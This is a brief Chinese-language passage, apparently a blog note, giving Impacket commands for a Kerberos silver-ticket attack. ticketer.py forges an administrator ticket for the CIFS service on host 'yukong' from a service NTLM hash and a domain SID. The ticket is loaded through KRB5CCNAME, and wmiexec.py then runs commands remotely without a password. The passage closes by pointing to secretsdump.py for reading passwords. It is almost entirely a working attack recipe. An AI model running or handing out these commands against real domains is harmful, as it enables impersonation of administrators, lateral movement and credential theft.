文章目录
命令
需要目标服务的ntlmhash,域的sid,域名与你要伪造的用户的hash
python ticketer.py -nthash 77bec211c5b72988b659dbbcf1052b2c -spn cifs/yukong -domain-sid S-1-5-21-3763276348-88739081-2848684050 -domain test.com administrator
set KRB5CCNAME=administrator.ccache
python wmiexec.py -k -no-pass yukong
也可以直接用secretdumps.py读密码: